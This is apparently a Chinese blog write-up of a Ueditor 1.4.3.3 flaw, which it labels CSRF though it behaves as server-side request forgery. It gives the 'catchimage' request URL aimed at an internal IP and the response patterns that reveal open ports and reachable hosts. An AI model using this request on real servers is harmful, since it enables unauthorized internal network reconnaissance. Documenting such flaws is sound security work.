Ueditor_1.4.3.3版本CSRF漏洞

# Ueditor 1.4.3.3版本CSRF漏洞
==存在漏洞路徑==

http://localhost:8088/jsp/controller.jsp?action=catchimage&source[]=http://192.168.135.133:8080/test.jpg

==漏洞利用==
可根據頁面返回的結果不同判斷該地址端口是否開放:

如果抓取不存在的圖片地址時,頁面返回{“state”: “SUCCESS”, list: [{“state”:”\u8fdc\u7a0b\u8fde\u63a5\u51fa\u9519″} ]},即state為“遠程連接出錯”。

如果成功抓取到圖片,頁面返回{“state”: “SUCCESS”, list: [{“state”: “SUCCESS”,”size”:”5103″,”source”:”http://192.168.135.133 :8080/tomcat.png”,”title”:”1527173588127099881.png”,”url”:”/ueditor/jsp/upload/image/20180524/1527173588127099881.png”} ]},即state為“SUCCESS”。

如果主機無法訪問,頁面返回{“state”:”SUCCESS”, list: [{“state”: “\u6293\u53d6\u8fdc\u7a0b\u56fe\u7247\u5931\u8d25”}]},即state為“抓取遠程圖片失敗”。

由於除了在config.js中的catcherLocalDomain配置了過濾的地址外,沒有針對內部地址進行過濾,所以可以根據抓取遠程圖片返回結果的不同,來進行內網的探測。

© 版权声明
THE END
喜欢就支持一下吧
点赞0 分享
评论 抢沙发

请登录后发表评论

    请登录后查看评论内容